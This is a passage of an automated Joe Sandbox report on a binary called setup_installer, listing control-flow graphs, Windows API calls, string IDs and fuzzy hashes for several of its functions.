                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                        • API String ID: 180289352-802862622
                                        • Opcode ID: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
                                        • Instruction ID: 6939841f741f7d36a15a20a0e3427741af3cfa69e4de5986cbad5950b484ded2
                                        • Opcode Fuzzy Hash: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
                                        • Instruction Fuzzy Hash: A9115B749403099BDF10DFA4C949BAEBBF5EB04705F11442EE546B7280D778A894CBA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 438 40a53f-40a569 call 418d80 441 40a598-40a59b 438->441 442 40a56b-40a575 call 4031dd 438->442 444 40a5a1-40a5b2 call 4031dd 441->444 445 40a633-40a636 call 40a2c8 441->445 450 40a582 442->450 451 40a577-40a580 442->451 456 40a5c0 444->456 457 40a5b4-40a5be call 4065b9 444->457 449 40a63b-40a647 445->449 453 40a81d-40a826 449->453 454 40a64d-40a651 449->454 455 40a584-40a593 call 4063e5 450->455 451->455 461 40a828-40a82a 453->461 462 40a82e-40a837 453->462 454->453 459 40a657-40a65b 454->459 455->445 458 40a5c3-40a5f3 call 4063e5 call 4037d2 call 4053b3 456->458 457->458 487 40a5f5-40a606 GetLastError 458->487 488 40a626-40a62c 458->488 459->453 465 40a661-40a665 459->465 461->462 467 40a839-40a83b 462->467 468 40a83f 462->468 471 40a670-40a679 465->471 472 40a667-40a66a 465->472 467->468 473 40a841-40a84f 468->473 475 40a7be-40a7c7 471->475 476 40a67f-40a69b call 4032ce 471->476 472->453 472->471 478 40a7c9-40a7cb 475->478 479 40a7cf-40a7d8 475->479 476->475 486 40a6a1-40a6c4 call 409111 476->486 478->479 482 40a7e0-40a7e3 479->482 483 40a7da-40a7dc 479->483 482->473 483->482 495 40a7b5-40a7bd call 403204 486->495 496 40a6ca-40a6e2 call 4032ce 486->496 490 40a608-40a60a 487->490 491 40a60e-40a617 487->491 488->445 490->491 493 40a619-40a61b 491->493 494 40a61f-40a621 491->494 493->494 494->473 495->475 501 40a7a4-40a7af 496->501 502 40a6e8-40a74d call 403740 call 401ef8 call 40a8b7 call 40399c call 403204 call 4037d2 call 4039d8 call 40a891 496->502 501->495 501->496 519 40a768-40a777 call 4053b3 502->519 520 40a74f-40a766 call 4037d2 call 40a891 502->520 526 40a797-40a7a3 call 403204 519->526 527 40a779-40a795 call 409944 call 40a2c8 519->527 520->519 520->526 526->501 527->526 535 40a7e5-40a800 call 403204 * 2 527->535 540 40a802-40a804 535->540 541 40a808-40a811 535->541 540->541 542 40a813-40a815 541->542 543 40a819-40a81b 541->543 542->543 543->473
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040A544
                                        • GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 0040A5F5
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040A2C8: __EH_prolog.LIBCMT ref: 0040A2CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorExceptionLastThrowmalloc
                                        • String ID: .001$.exe$Split
                                        • API String ID: 1950902910-1819480430
                                        • Opcode ID: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
                                        • Instruction ID: fbde023dd8d3616a20bf780c395040672d5308453d4d409ddda090532e3e46f0
                                        • Opcode Fuzzy Hash: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
                                        • Instruction Fuzzy Hash: 21A18030A003099FCB14EFA5C585AAEBBB4BF04318F14846EE856BB2D1CB39DE55CB55

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 544 404daf-404dcf call 418d80 call 405780 549 404f83-404f99 call 405719 544->549 550 404dd5-404ddb 544->550 556 404f9b-404f9d 549->556 557 404f9e-404fab call 4055de 549->557 550->549 551 404de1-404e01 call 4036b0 * 2 550->551 564 404e03-404e09 551->564 565 404e0e-404e14 551->565 556->557 562 405000-405007 557->562 563 404fad-404fb3 557->563 569 405013-40501a 562->569 570 405009-40500d 562->570 563->562 566 404fb5-404fc1 call 404da0 563->566 564->565 567 404e16-404e29 call 4032ce 565->567 568 404e2b-404e33 call 4039d8 565->568 571 4050f1-4050f6 call 404b47 566->571 586 404fc7-404fca 566->586 567->568 579 404e38-404e45 call 4056f0 567->579 568->579 572 40504c-405053 call 405693 569->572 573 40501c-405026 call 404da0 569->573 570->569 570->571 585 4050fb 571->585 572->571 592 405059-405064 572->592 573->571 588 40502c-40502f 573->588 594 404e47-404e4a 579->594 595 404e7d-404e87 call 404daf 579->595 590 4050fd-405100 call 404b27 585->590 586->571 591 404fd0-404fed call 404d7d call 40376e 586->591 588->571 593 405035-40504a call 404d7d 588->593 603 405105 590->603 615 404ff9-404ffb 591->615 623 404fef-404ff4 591->623 592->571 598 40506a-405071 call 405596 592->598 593->615 601 404e58-404e70 call 404d7d 594->601 602 404e4c-404e4f 594->602 613 404f71-404f82 call 403204 * 2 595->613 614 404e8d 595->614 598->571 618 405073-4050a6 call 4036b0 call 401ef8 * 2 call 404b47 598->618 620 404e8f-404eb5 call 403740 call 40368d 601->620 622 404e72-404e7b call 4037d2 601->622 602->595 608 404e51-404e56 602->608 609 405107-405115 603->609 608->595 608->601 613->549 614->620 615->590 645 4050a8-4050be wcscmp 618->645 646 4050cb-4050d8 call 404da0 618->646 636 404eba-404ed0 call 404d3d 620->636 622->620 623->615 642 404ed2-404ed6 636->642 643 404f06-404f08 636->643 647 404ed8-404ee5 call 403210 642->647 648 404efe-404f00 SetLastError 642->648 644 404f40-404f6c call 403204 * 2 call 404b27 call 403204 * 2 643->644 644->603 649 4050c0-4050c5 645->649 650 4050c7 645->650 660 405118-405122 call 404d7d 646->660 661 4050da-4050dd 646->661 662 404ee7-404efc call 403204 call 40368d 647->662 663 404f0a-404f10 647->663 648->643 654 405136-40514e call 40376e call 403204 call 404b27 649->654 650->646 654->609 684 405124-405127 660->684 685 405129 660->685 669 4050e4-4050f0 call 403204 661->669 670 4050df-4050e2 661->670 662->636 665 404f12-404f17 663->665 666 404f23-404f3e call 40399c 663->666 665->666 676 404f19-404f1f 665->676 666->644 669->571 670->660 670->669 676->666 689 405130-405133 684->689 685->689 689->654
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00404DB4
                                        • SetLastError.KERNEL32(00000002,?,?,?,:$DATA,?,00000000,?,?,00000001), ref: 00404F00
                                        • wcscmp.MSVCRT ref: 004050B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorH_prologLastwcscmp
                                        • String ID: :$DATA
                                        • API String ID: 161073058-2587938151
                                        • Opcode ID: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
                                        • Instruction ID: da1b248e0d231fcc0c283d7306f0842e77f2967e3c74f92a20ef298db707ecaa
                                        • Opcode Fuzzy Hash: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
                                        • Instruction Fuzzy Hash: 8EB1D2719006059ACF24EFA5C841AEEBBB4EF54318F10813FE552772E2DB3D5A49CB58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 694 40ebb1-40ebd4 call 418d80 call 407b3a 699 40ed32-40ed40 694->699 700 40ebda-40ebe3 call 40ed43 694->700 703 40ebe5-40ebe7 700->703 704 40ebec-40ebf1 700->704 703->699 705 40ec02-40ec26 call 4031dd memcpy 704->705 706 40ebf3-40ebf8 704->706 710 40ec2a-40ec31 705->710 706->705 707 40ebfa-40ebfd 706->707 707->699 711 40ec51-40ec6d call 406749 710->711 712 40ec33-40ec41 710->712 717 40ec73-40ec78 711->717 718 40ed25 711->718 712->711 713 40ec43-40ec45 712->713 713->711 714 40ec47-40ec4b 713->714 714->711 716 40ece9-40ecec 714->716 719 40ed27-40ed30 call 403204 716->719 717->716 720 40ec7a-40ec86 717->720 718->719 719->699 722 40ec88-40ec8b 720->722 723 40eccb-40ece4 memmove 720->723 724 40ecb2-40ecb4 722->724 725 40ec8d-40ec91 722->725 723->710 724->723 729 40ecb6-40ecc4 call 40ed43 724->729 727 40ec93-40ec97 725->727 728 40eca8-40eca9 725->728 730 40ec99-40ec9d 727->730 731 40ecab-40ecad 727->731 728->724 737 40ecc6-40ecc9 729->737 738 40ecee-40ed22 memcpy call 406827 729->738 733 40ecaf 730->733 734 40ec9f-40eca4 730->734 731->724 733->724 734->722 736 40eca6 734->736 736->724 737->720 738->718
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
                                        • Instruction ID: c12524c289feaf3e84e46ecd753a7b8664c50a4f4eb467be383fba77f0e1be85
                                        • Opcode Fuzzy Hash: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
                                        • Instruction Fuzzy Hash: 8D51E071A042069BEB24DF56C885BAEB3B5FF44304F18493AE401B73C1D77DAD558B58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 741 4019f5-401a30 call 418d80 call 418db0 call 4053b3 748 401b63-401b6b call 405298 741->748 749 401a36-401a3c 741->749 756 401b6d-401b7b 748->756 751 401a4a-401a53 749->751 752 401a3e-401a48 749->752 754 401a61-401a6d 751->754 755 401a55-401a5f 751->755 752->751 752->752 757 401a71-401a88 call 405410 754->757 755->754 755->755 759 401a8d-401a8f 757->759 760 401a95-401a9a 759->760 761 401b5b-401b5d 759->761 762 401aa0-401aa2 760->762 763 401b5f-401b61 760->763 764 401b4f-401b59 call 405298 761->764 766 401aa8-401aae 762->766 763->764 764->756 768 401ab0-401ab5 766->768 769 401aea-401aef 766->769 770 401b10-401b36 memmove 768->770 771 401ab7-401ac8 memcmp 768->771 769->770 772 401af1-401b02 memcmp 769->772 776 401b45-401b4c 770->776 777 401b38-401b3f 770->777 771->763 773 401ace-401ad5 771->773 774 401b04-401b0e 772->774 775 401ae6-401ae8 772->775 773->748 779 401adb-401ae1 call 401b7e 773->779 774->766 775->766 776->764 777->776 778 401a6f 777->778 778->757 779->775
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: memcmp$H_prologmemmove
                                        • String ID:
                                        • API String ID: 1585842370-0
                                        • Opcode ID: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
                                        • Instruction ID: 38dfcbe944138311f729fb0dfaf23ea4560b4517be3ec0a244e0583db9330822
                                        • Opcode Fuzzy Hash: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
                                        • Instruction Fuzzy Hash: E241AC72D002499BCF11DFA4C840BEEBBB5AF45384F14416AE855772E2E3389A85CB68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 781 40bcc7-40bcf7 call 418d80 EnterCriticalSection 784 40bcf9-40bcfc 781->784 785 40bcfe-40bd0b call 406827 781->785 784->785 786 40bd22-40bd39 call 406749 784->786 787 40bd0e-40bd11 785->787 790 40bd3c-40bd5a 786->790 788 40bd61-40bd79 LeaveCriticalSection 787->788 789 40bd13-40bd1f 787->789 789->786 790->788 791 40bd5c-40bd5f 790->791 791->788
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040BCCC
                                        • EnterCriticalSection.KERNEL32(?), ref: 0040BCE1
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040BD64
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prologLeave
                                        • String ID:
                                        • API String ID: 367238759-0
                                        • Opcode ID: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
                                        • Instruction ID: 6cfa36094df7fceee4fe309223ea3ff0f653a710c7f9d26e1c3ca6cc2b4dbde7
                                        • Opcode Fuzzy Hash: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
                                        • Instruction Fuzzy Hash: F82128756007009FDB28CF14D884A6BB7B5FF88714F10895EE8569B7A1C774E944CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1118 409dad-409dc5 call 418d80 1121 409dc7-409dcd 1118->1121 1122 409dcf-409dd4 1118->1122 1121->1122 1123 409dd6-409ddc 1122->1123 1124 409ddf-409de4 1122->1124 1123->1124 1125 409de6-409dec 1124->1125 1126 409def-409e33 call 409944 call 40429a call 40368d call 403a5b 1124->1126 1125->1126 1138 409e45-409e5f 1126->1138 1139 409e35-409e40 call 40376e 1126->1139 1141 409e61-409e64 1138->1141 1142 409e73-409e7e 1138->1142 1139->1138 1143 409e66 1141->1143 1144 409e69-409e70 call 4031dd 1141->1144 1145 409e80-409e8c 1142->1145 1146 409e8e-409e91 1142->1146 1143->1144 1144->1142 1145->1145 1145->1146 1148 409ea1-409ea8 1146->1148 1149 409e93-409e9f 1146->1149 1151 409eab-409eb3 1148->1151 1149->1151 1152 409ed4-409edf 1151->1152 1153 409eb5-409ecf call 4088fd 1151->1153 1155 409ee5-409ef7 1152->1155 1156 409f6f-409f72 1152->1156 1167 409f99-409fa4 1153->1167 1160 409ef9-409efc 1155->1160 1161 409efe-409f10 call 4032ce 1155->1161 1157 409f74-409f7a 1156->1157 1158 409f89-409f94 1156->1158 1163 409f86 1157->1163 1164 409f7c-409f81 1157->1164 1166 409f96 1158->1166 1158->1167 1160->1161 1162 409f12-409f23 call 40b70b 1160->1162 1161->1162 1173 409f5e-409f69 1161->1173 1162->1173 1178 409f25-409f33 call 409144 1162->1178 1163->1158 1168 40a16d-40a190 call 403204 * 4 1164->1168 1166->1167 1171 409fd1-409fe6 1167->1171 1172 409fa6-409fb6 call 406827 1167->1172 1211 40a192-40a1a0 1168->1211 1176 40a166-40a168 1171->1176 1177 409fec-409ff5 1171->1177 1186 40a1a3-40a1a5 1172->1186 1187 409fbc-409fc6 call 406827 1172->1187 1173->1155 1173->1156 1176->1168 1180 40a16a-40a16c 1176->1180 1182 409ff7-409ffa 1177->1182 1183 409ffd-40a003 1177->1183 1196 409f53-409f59 call 4088fd 1178->1196 1197 409f35-409f51 call 40b406 1178->1197 1180->1168 1182->1183 1183->1176 1184 40a009-40a01d 1183->1184 1190 40a032-40a037 1184->1190 1191 40a01f-40a02c 1184->1191 1186->1168 1198 409fc9-409fcb 1187->1198 1194 40a039-40a040 call 406827 1190->1194 1195 40a04b-40a069 call 409d49 1190->1195 1191->1186 1191->1190 1205 40a043-40a045 1194->1205 1209 40a1a7-40a1b0 1195->1209 1210 40a06f-40a074 1195->1210 1196->1173 1197->1173 1198->1171 1198->1186 1205->1186 1205->1195 1212 40a1b2-40a1b4 1209->1212 1213 40a1b8-40a1bb 1209->1213 1214 40a076-40a07a 1210->1214 1215 40a07f-40a082 1210->1215 1212->1213 1213->1168 1216 40a157-40a160 1214->1216 1217 40a084-40a09c 1215->1217 1218 40a0a5-40a0bf 1215->1218 1216->1176 1216->1184 1267 40a09d call 40e520 1217->1267 1268 40a09d call 40ed82 1217->1268 1222 40a0c5-40a0da 1218->1222 1223 40a1bd-40a1c6 1218->1223 1219 40a0a0-40a0a3 1221 40a0e2-40a0f6 call 409970 1219->1221 1232 40a1f8-40a201 1221->1232 1233 40a0fc-40a100 1221->1233 1222->1221 1231 40a0dc-40a0de 1222->1231 1225 40a1c8-40a1ca 1223->1225 1226 40a1ce-40a1f6 call 403204 * 4 1223->1226 1225->1226 1226->1211 1231->1221 1235 40a203-40a205 1232->1235 1236 40a209-40a20c 1232->1236 1237 40a106-40a109 1233->1237 1238 40a22b-40a22e 1233->1238 1235->1236 1236->1168 1242 40a115 1237->1242 1243 40a10b-40a113 1237->1243 1239 40a230-40a239 1238->1239 1240 40a249-40a25c call 4063e5 1238->1240 1245 40a241-40a244 1239->1245 1246 40a23b-40a23d 1239->1246 1240->1168 1256 40a262-40a268 1240->1256 1244 40a118-40a11b 1242->1244 1243->1242 1243->1244 1249 40a146-40a14f 1244->1249 1250 40a11d-40a121 1244->1250 1245->1168 1246->1245 1249->1216 1255 40a151-40a153 1249->1255 1250->1249 1253 40a123-40a13b call 40a26d 1250->1253 1253->1249 1261 40a13d-40a140 1253->1261 1255->1216 1256->1168 1261->1249 1262 40a211-40a21a 1261->1262 1262->1180 1263 40a220-40a226 1262->1263 1263->1180 1267->1219 1268->1219
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Split
                                        • API String ID: 3519838083-1882502421
                                        • Opcode ID: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
                                        • Instruction ID: 09c5a0370ad5ed14047af77479f4839a91d55b5c5a0b00876ef22aa24b9ab58f
                                        • Opcode Fuzzy Hash: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
                                        • Instruction Fuzzy Hash: 98022A70A00249EFCB10DFA5C8849AEBBB5BF48304F14847EE516EB392C739AE55CB55

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004026C6
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Default
                                        • API String ID: 3519838083-753088835
                                        • Opcode ID: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
                                        • Instruction ID: a54c0451a2b32841cee07a3996f3f819ed4c8f4dfc8041cf4803658e5a70c8e5
                                        • Opcode Fuzzy Hash: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
                                        • Instruction Fuzzy Hash: 84515171800109ABDB11EFA5C981EDDFBB9BF14308F1085AEE515B32D2DB786A09CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1341 40fe8a-40ff0f call 418d80 call 40e063 call 40e83c * 2 call 40fc2a call 40bc60 1354 40ff15 1341->1354 1355 41003d-410045 1341->1355 1356 40ff1a-40ff40 call 410d82 1354->1356 1357 410047-410057 1355->1357 1358 41005a-410064 call 40dc5d 1355->1358 1363 40ff46-40ff48 1356->1363 1364 4100a6-4100b5 _CxxThrowException 1356->1364 1357->1358 1362 410069-410093 call 403204 * 3 call 40df15 1358->1362 1392 410095-4100a3 1362->1392 1363->1364 1367 40ff4e-40ff5e call 407ab8 call 4031dd 1363->1367 1366 4100ba-4100c0 1364->1366 1369 4100c2-4100c4 1366->1369 1370 4100c8-410104 call 40dc5d call 403204 * 3 call 40df15 1366->1370 1383 40ff60-40ff6b 1367->1383 1384 40ff6d 1367->1384 1369->1370 1370->1392 1387 40ff6f-40ff74 1383->1387 1384->1387 1390 40ff76-40ff78 1387->1390 1391 40ff7c-40ffc4 call 40bd85 1387->1391 1390->1391 1395 40ffc9-40ffce 1391->1395 1395->1366 1397 40ffd4-40ffd7 1395->1397 1399 40ffe0-40ffe9 1397->1399 1400 40ffd9-40ffdc 1397->1400 1402 41001a-410020 1399->1402 1403 40ffeb-40fff4 1399->1403 1400->1399 1405 410022-410024 1402->1405 1406 410028-410034 1402->1406 1403->1402 1404 40fff6-410013 call 418c10 1403->1404 1404->1402 1411 410015 call 40e966 1404->1411 1405->1406 1407 40ff17 1406->1407 1408 41003a 1406->1408 1407->1356 1408->1355 1411->1402
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040FE8F
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 004100B5
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prologmalloc
                                        • String ID:
                                        • API String ID: 3044594480-0
                                        • Opcode ID: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
                                        • Instruction ID: 88fd23d13b2165b9f29fbfc804bd3c55ab1378a3526c832d929a2e01daa6a8e0
                                        • Opcode Fuzzy Hash: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
                                        • Instruction Fuzzy Hash: 5B814E71D002499FCB21DFA9C881AEEBBB4AF09304F1480AEE555B7292C7785E85CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1413 404678-4046b9 call 418d80 call 404d7d call 40368d call 404daf 1422 4046c9-4046d1 1413->1422 1423 4046bb 1413->1423 1425 4046e0-4046e8 1422->1425 1426 4046d3-4046de SetLastError 1422->1426 1424 4046be-4046c4 call 403204 1423->1424 1433 4047f2-4047f4 1424->1433 1428 4046ea 1425->1428 1429 4046ee-4046ff call 403204 1425->1429 1426->1423 1428->1429 1434 4047e5-4047f0 call 404462 1429->1434 1435 404705-40474e call 403740 call 401ef8 call 40368d call 4051f7 call 404d7d call 40368d 1429->1435 1436 4047fd-40480b 1433->1436 1434->1433 1441 4047f6-4047f8 call 404470 1434->1441 1453 404752-404759 call 405233 1435->1453 1441->1436 1455 40475e-404760 1453->1455 1456 4047c2-4047e4 call 403204 * 2 call 404b27 call 403204 1455->1456 1457 404762-404765 1455->1457 1456->1434 1458 404772-404786 call 40399c 1457->1458 1459 404767-40476d 1457->1459 1465 404796-40479e call 404643 1458->1465 1466 404788-40478b call 404678 1458->1466 1459->1458 1471 404790-404792 1465->1471 1466->1471 1474 4047a0-4047bd call 403204 * 2 call 404b27 1471->1474 1475 404794 1471->1475 1474->1424 1475->1453
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040467D
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                        • SetLastError.KERNEL32(0000010B,?,75C50B80,?,00000000), ref: 004046D8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorLast
                                        • String ID:
                                        • API String ID: 2901101390-0
                                        • Opcode ID: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
                                        • Instruction ID: 7e41f2cfff906f94df3d93499aef528f4dd0a588830c47bb788408f42dae3ac8
                                        • Opcode Fuzzy Hash: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
                                        • Instruction Fuzzy Hash: 8D416C71C002089ADF14EBA6D442AEDBB74AF45318F2080BEE661731D2DB3D6A09DB18

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040B295
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        • _CxxThrowException.MSVCRT(?,0041C760), ref: 0040B2F4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
